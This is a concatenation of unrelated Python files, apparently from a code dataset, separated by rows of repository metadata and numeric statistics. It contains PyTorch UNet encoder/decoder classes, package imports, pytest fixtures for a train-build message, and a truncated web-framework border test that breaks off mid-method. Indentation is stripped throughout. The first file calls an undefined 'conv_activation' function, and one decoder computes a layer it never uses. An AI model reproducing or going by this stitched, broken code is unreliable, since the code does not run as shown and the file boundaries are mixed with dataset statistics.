def flow(in_ch, out_ch , kernel_size = 3, stride = 1, padding = 1, activation = 'linear' , init_type = 'w_init'):
if activation == 'relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding))
def upsample(in_ch, out_ch):
return nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True)
def leaky_deconv(in_ch, out_ch):
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.LeakyReLU(0.1,inplace=True)
)
def deconv_activation(in_ch, out_ch ,activation = 'relu' ):
if activation == 'relu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True))
#-----------------------------UNet----------------------------------
class Encoder(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv4 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
conv4 = self.conv4(conv3)
return conv1,conv2,conv3,conv4
class Encoder_2(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder_2, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(64, 64 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
return conv1,conv2,conv3
class Encoder_3(nn.Module):
def __init__(self,in_ch,activation = 'selu', init_type = 'w_init'):
super(Encoder_3, self).__init__()
self.layer_f = conv_activation(in_ch, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv1 = conv_activation(64, 64 , kernel_size = 5 ,stride = 1,padding = 2, activation = activation, init_type = init_type)
self.conv2 = conv_activation(64, 128 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
self.conv3 = conv_activation(128, 256 , kernel_size = 5 ,stride = 2,padding = 2, activation = activation, init_type = init_type)
def forward(self,x):
layer_f = self.layer_f(x)
conv1 = self.conv1(layer_f)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
return conv1,conv2,conv3
class UNet_decoder(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder, self).__init__()
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192 , 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
warp_deconv4 = self.warp_deconv4(concat0)
concat1 = torch.cat((warp_deconv4,LR_conv3,warp_conv3),1)
warp_deconv3 = self.warp_deconv3(concat1)
concat2 = torch.cat((warp_deconv3,LR_conv2,warp_conv2),1)
warp_deconv2 = self.warp_deconv2(concat2)
concat3 = torch.cat((warp_deconv2,LR_conv1,warp_conv1),1)
post_fusion1 = self.post_fusion1(concat3)
final = self.final(post_fusion1)
return final
class UNet_decoder_2(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder_2, self).__init__()
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192 , 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.post_fusion2 = conv_activation(64, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
warp_deconv4 = self.warp_deconv4(concat0)
concat1 = torch.cat((warp_deconv4,LR_conv3,warp_conv3),1)
warp_deconv3 = self.warp_deconv3(concat1)
concat2 = torch.cat((warp_deconv3,LR_conv2,warp_conv2),1)
warp_deconv2 = self.warp_deconv2(concat2)
concat3 = torch.cat((warp_deconv2,LR_conv1,warp_conv1),1)
post_fusion1 = self.post_fusion1(concat3)
post_fusion2 = self.post_fusion2(post_fusion1)
final = self.final(post_fusion1)
return final
class ResBlock(nn.Module):
"""
Basic residual block for SRNTT.
Parameters
---
n_filters : int, optional
a number of filters.
"""
def __init__(self, n_filters=64):
super(ResBlock, self).__init__()
self.body = nn.Sequential(
nn.Conv2d(n_filters, n_filters, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(n_filters, n_filters, 3, 1, 1),
)
def forward(self, x):
return self.body(x) + x
class UNet_decoder_textrans(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_textrans, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(64, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(64, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
self.warp_deconv2 = deconv_activation(64, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(64, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
h = self.head_deconv4(concat0)
h = self.body_deconv4(h) + LR_conv4
x = self.warp_deconv4(h)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
h = self.head_deconv3(concat1)
h = self.body_deconv3(h) + x
x = self.warp_deconv3(h)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
h = self.head_deconv2(concat2)
h = self.body_deconv2(h) + x
x = self.warp_deconv2(h)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
h = self.head_deconv1(concat3)
h = self.body_deconv1(h) + x
post_fusion1 = self.post_fusion1(h)
final = self.final(post_fusion1)
return final
class UNet_decoder_weight(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_weight, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(128, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
self.warp_deconv2 = deconv_activation(128, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(128, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
w = self.head_deconv4(concat0)
h = self.body_deconv4(w) * warp_conv4
x = torch.cat((h, LR_conv4),1)
x = self.warp_deconv4(x)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
w = self.head_deconv3(concat1)
h = self.body_deconv3(w) * warp_conv3
x = torch.cat((x, h),1)
x = self.warp_deconv3(x)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
w = self.head_deconv2(concat2)
h = self.body_deconv2(w) * warp_conv2
x = torch.cat((x, h),1)
x = self.warp_deconv2(x)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
w = self.head_deconv1(concat3)
h = self.body_deconv1(w) * warp_conv1
x = torch.cat((x, h),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
class UNet_decoder_weight_2(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_weight_2, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
w = self.head_deconv4(concat0)
h = self.body_deconv4(w) * warp_conv4
x = torch.cat((h, LR_conv4),1)
x = self.warp_deconv4(x)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
w = self.head_deconv3(concat1)
h = self.body_deconv3(w) * warp_conv3
x = torch.cat((x, h, LR_conv3),1)
x = self.warp_deconv3(x)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
w = self.head_deconv2(concat2)
h = self.body_deconv2(w) * warp_conv2
x = torch.cat((x, h, LR_conv2),1)
x = self.warp_deconv2(x)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
w = self.head_deconv1(concat3)
h = self.body_deconv1(w) * warp_conv1
x = torch.cat((x, h, LR_conv1),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
class UNet_decoder_VAE(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder_VAE, self).__init__()
self.warp_deconv4 = deconv_activation(64, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(128, 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(128, 64,activation = activation)
self.post_fusion1 = conv_activation(128, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,Ref_conv1, Ref_conv2, Ref_conv3, Ref_conv4):
x = self.warp_deconv4(Ref_conv4)
x = torch.cat((x,Ref_conv3),1)
x = self.warp_deconv3(x)
x = torch.cat((x,Ref_conv2),1)
x = self.warp_deconv2(x)
x = torch.cat((x,Ref_conv1),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
| 36.348112 | 145 | 0.616372 | 2,950 | 22,136 | 4.376271 | 0.042712 | 0.051433 | 0.03904 | 0.039659 | 0.938652 | 0.92409 | 0.910534 | 0.899613 | 0.874284 | 0.859721 | 0 | 0.054905 | 0.255376 | 22,136 | 608 | 146 | 36.407895 | 0.728326 | 0.129066 | 0 | 0.708683 | 0 | 0 | 0.015433 | 0 | 0 | 0 | 0 | 0.001645 | 0 | 1 | 0.07563 | false | 0 | 0.011204 | 0.008403 | 0.193277 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
01ed134bd4fca63b2055275f79ae5b6bfd95a30a | 172 | py | Python | BlackBox_Python/__init__.py | UBC-MDS/BlackBox_Python | 5eb7effa09d21b5fe0ca8a2bb18a456d1e6edcc8 | [
"MIT"
] | null | null | null | BlackBox_Python/__init__.py | UBC-MDS/BlackBox_Python | 5eb7effa09d21b5fe0ca8a2bb18a456d1e6edcc8 | [
"MIT"
] | 1 | 2018-03-04T10:46:34.000Z | 2018-03-04T10:46:34.000Z | BlackBox_Python/__init__.py | UBC-MDS/BlackBox_Python | 5eb7effa09d21b5fe0ca8a2bb18a456d1e6edcc8 | [
"MIT"
] | 4 | 2018-02-11T05:49:07.000Z | 2018-03-17T02:39:29.000Z | from BlackBox_Python.ci import getCredibleInterval, getConfidenceInterval
from BlackBox_Python.ABtests import performABtest_Freq
from BlackBox_Python.MapVMle import getMLE
| 43 | 73 | 0.901163 | 20 | 172 | 7.55 | 0.6 | 0.238411 | 0.357616 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075581 | 172 | 3 | 74 | 57.333333 | 0.949686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bf02c5059ff223e2ccf96dbd7cd9daad4ec3715b | 187 | py | Python | goldsberry/league/__init__.py | Reid1923/py-GoldsberryTest | 3c7e9e2f4ef75720e1a13c4c41018a2072487ddd | [
"MIT"
] | null | null | null | goldsberry/league/__init__.py | Reid1923/py-GoldsberryTest | 3c7e9e2f4ef75720e1a13c4c41018a2072487ddd | [
"MIT"
] | null | null | null | goldsberry/league/__init__.py | Reid1923/py-GoldsberryTest | 3c7e9e2f4ef75720e1a13c4c41018a2072487ddd | [
"MIT"
] | null | null | null | from goldsberry.league._League import *
from goldsberry.league import _Draft as draft
from goldsberry.league import _PlayType as playtype
from goldsberry.league import _SportVu as sportvu | 46.75 | 51 | 0.855615 | 26 | 187 | 6 | 0.307692 | 0.358974 | 0.512821 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112299 | 187 | 4 | 52 | 46.75 | 0.939759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1795eb11d547b6a54aff9c9a556da4669e611f81 | 4,985 | py | Python | tests/test_messages.py | PHT-Medic/central-train-builder | 4e557a30dbfd8a96df577e1ce550268cf46f6d22 | [
"MIT"
] | null | null | null | tests/test_messages.py | PHT-Medic/central-train-builder | 4e557a30dbfd8a96df577e1ce550268cf46f6d22 | [
"MIT"
] | 19 | 2021-11-22T12:20:33.000Z | 2022-03-15T11:14:32.000Z | tests/test_messages.py | PHT-EU/central-train-builder | 4e557a30dbfd8a96df577e1ce550268cf46f6d22 | [
"MIT"
] | null | null | null | import json
import pytest
from builder.messages import BuildMessage
@pytest.fixture
def build_message():
return {
"id": "f54f58d9-58a1-4141-9dfb-a48b2a275998",
"type": "trainBuildStart",
"metadata": {},
"data": {
"user_id": 5,
"user_rsa_secret_id": "test-rsa",
"userPaillierSecretId": "test-paillier",
"id": "da8fd868-0fed-42e3-b6d8-5abbf0864d4a",
"proposal_id": 4,
"stations": [
{
"id": "test-station",
"ecosystem": "tue",
"index": 1
}
],
"files": [
"test_train/entrypoint.py",
"test_train/requirements.txt"
],
"master_image": "python/slim",
"entrypointExecutable": "python",
"entrypoint_path": "test_train/entrypoint.py",
"session_id": "8203c4facff907d3bd83f8399e9a97aa4270e27acb4369f5bcdaab20643f2dc7c2ca8fe78a576c3ae7ac56b64d89a778aa86f7f90360734965dce0264ddcd705",
"hash": "91416369e845e7ff12efe8514736d468b71bfc15cc5ded92399a1a558f4317da68cfd5884cb9e5bbbac15ce45731afe4e47ced256c7a2e493ff7fad5481b8d31",
"hash_signed": "ace71ecae217b8da4426cee8ba8abeddab6d1d9c9d073e7c54197b82a1d453189ca2a3e278be7747b4e0fac28bba32dc1b5a4dbc4b060a2f5e659180367b56b90b6ee8f59f529206e39645acd0bd24c03c3ef291ac8ad91dbf4390541033656ec3ee48a516a94348cb60ed596be305c3754e7e4b66dc433bb47a2483ea7d772cc6a353bb43b82e4f35f7dc6ee1f502765d64785ea816b20eed6c3a1ea857a753d5048e16d395d3479b62d91c9870d9f19ee0740b6051a3089e5350227820281406d267e188ac4edb1f0f3ebd36a0aa6cb2eeeaaa71023b0e8e6381d3bc683277208a7c91de77d61e4a8ca8f71621449e564f57bb8eaef25f08da61e8b0b79f61",
"user_he_key": "12345241",
"entrypoint_command": "run"
}
}
@pytest.fixture
def build_message_query():
return {
"id": "f54f58d9-58a1-4141-9dfb-a48b2a275998",
"type": "trainBuildStart",
"metadata": {},
"data": {
"user_id": 5,
"user_rsa_secret_id": "test-rsa",
"userPaillierSecretId": "test-paillier",
"id": "da8fd868-0fed-42e3-b6d8-5abbf0864d4a",
"proposal_id": 4,
"stations": [
{
"id": "test-station",
"ecosystem": "tue",
"index": 1
}
],
"files": [
"test_train/entrypoint.py",
"test_train/requirements.txt"
],
"master_image": "python/slim",
"entrypointExecutable": "python",
"entrypoint_path": "test_train/entrypoint.py",
"session_id": "8203c4facff907d3bd83f8399e9a97aa4270e27acb4369f5bcdaab20643f2dc7c2ca8fe78a576c3ae7ac56b64d89a778aa86f7f90360734965dce0264ddcd705",
"hash": "91416369e845e7ff12efe8514736d468b71bfc15cc5ded92399a1a558f4317da68cfd5884cb9e5bbbac15ce45731afe4e47ced256c7a2e493ff7fad5481b8d31",
"hash_signed": "ace71ecae217b8da4426cee8ba8abeddab6d1d9c9d073e7c54197b82a1d453189ca2a3e278be7747b4e0fac28bba32dc1b5a4dbc4b060a2f5e659180367b56b90b6ee8f59f529206e39645acd0bd24c03c3ef291ac8ad91dbf4390541033656ec3ee48a516a94348cb60ed596be305c3754e7e4b66dc433bb47a2483ea7d772cc6a353bb43b82e4f35f7dc6ee1f502765d64785ea816b20eed6c3a1ea857a753d5048e16d395d3479b62d91c9870d9f19ee0740b6051a3089e5350227820281406d267e188ac4edb1f0f3ebd36a0aa6cb2eeeaaa71023b0e8e6381d3bc683277208a7c91de77d61e4a8ca8f71621449e564f57bb8eaef25f08da61e8b0b79f61",
"query": {
"query": "/Patient?",
"data": {
"output_format": "json",
"filename": "patients.json",
}
},
"user_he_key": "12345241",
"entrypoint_command": "run"
}
}
@pytest.fixture
def status_message():
return {
"type": "trainStatus",
"data": {
"userId": 5,
"id": "test-train-1"
},
"metadata": {
}
}
def test_build_message_from_json(build_message, build_message_query):
build_hash = build_message["data"]["hash"]
message = BuildMessage(**build_message["data"])
assert isinstance(message, BuildMessage)
assert message
assert message.hash == build_hash
message = BuildMessage.parse_raw(json.dumps(build_message["data"]))
assert message
assert message.hash == build_hash
message = BuildMessage.parse_raw(json.dumps(build_message["data"]).encode("utf-8"))
assert message
assert message.hash == build_hash
with pytest.raises(ValueError):
message = BuildMessage.parse_raw(1)
query_message = BuildMessage(**build_message_query["data"])
assert query_message
query_message2 = BuildMessage.parse_raw(json.dumps(build_message_query["data"]).encode("utf-8"))
assert query_message == query_message2
| 40.860656 | 542 | 0.657974 | 304 | 4,985 | 10.582237 | 0.282895 | 0.041032 | 0.023624 | 0.026111 | 0.861672 | 0.822505 | 0.822505 | 0.797638 | 0.797638 | 0.797638 | 0 | 0.275559 | 0.24654 | 4,985 | 121 | 543 | 41.198347 | 0.580937 | 0 | 0 | 0.628571 | 0 | 0 | 0.510732 | 0.367101 | 0 | 0 | 0 | 0 | 0.085714 | 1 | 0.038095 | false | 0 | 0.028571 | 0.028571 | 0.095238 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
17965ce8cbb523de5f93387388e2af45e03c3c88 | 185 | py | Python | miso/modules/span_extractors/__init__.py | pitrack/arglinking | 5f4677efe580e2d22915d66be26ceff331a3b2c2 | [
"Apache-2.0"
] | 21 | 2020-07-09T14:01:26.000Z | 2022-02-04T20:49:23.000Z | miso/modules/span_extractors/__init__.py | pitrack/arglinking | 5f4677efe580e2d22915d66be26ceff331a3b2c2 | [
"Apache-2.0"
] | 5 | 2020-07-30T15:08:01.000Z | 2022-03-02T20:06:40.000Z | miso/modules/span_extractors/__init__.py | pitrack/arglinking | 5f4677efe580e2d22915d66be26ceff331a3b2c2 | [
"Apache-2.0"
] | 4 | 2020-08-14T13:49:45.000Z | 2021-07-28T01:37:44.000Z | from miso.modules.span_extractors.endpoint_span_extractor import EndpointSpanExtractor
from miso.modules.span_extractors.self_attentive_span_extractor import SelfAttentiveSpanExtractor
| 61.666667 | 97 | 0.924324 | 21 | 185 | 7.809524 | 0.571429 | 0.097561 | 0.182927 | 0.231707 | 0.353659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043243 | 185 | 2 | 98 | 92.5 | 0.926554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bd966bad181e6505347e60118b55ad733776912d | 24,490 | py | Python | tests/test_border.py | hattya/ayame | e8bb2b0ace79cd358b1384270cb9c5e809e12b5d | [
"MIT"
] | 1 | 2022-03-05T03:21:13.000Z | 2022-03-05T03:21:13.000Z | tests/test_border.py | hattya/ayame | e8bb2b0ace79cd358b1384270cb9c5e809e12b5d | [
"MIT"
] | 1 | 2021-08-25T13:41:34.000Z | 2021-08-25T13:41:34.000Z | tests/test_border.py | hattya/ayame | e8bb2b0ace79cd358b1384270cb9c5e809e12b5d | [
"MIT"
] | 1 | 2018-03-04T21:47:27.000Z | 2018-03-04T21:47:27.000Z | #
# test_border
#
# Copyright (c) 2011-2021 Akinori Hattori <hattya@gmail.com>
#
# SPDX-License-Identifier: MIT
#
import textwrap
import ayame
from ayame import basic, border, form, http, markup
from base import AyameTestCase
class BorderTestCase(AyameTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.app.config['ayame.markup.pretty'] = True
def test_border(self):
class Spam(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(SpamBorder('border'))
class SpamBorder(Border):
pass
with self.application():
mc = Spam('a')
self.assertTrue(mc.find('border').render_body_only)
self.assertTrue(mc.find('border').has_markup)
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 8)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Spam'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Spam',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'SpamBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 15)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
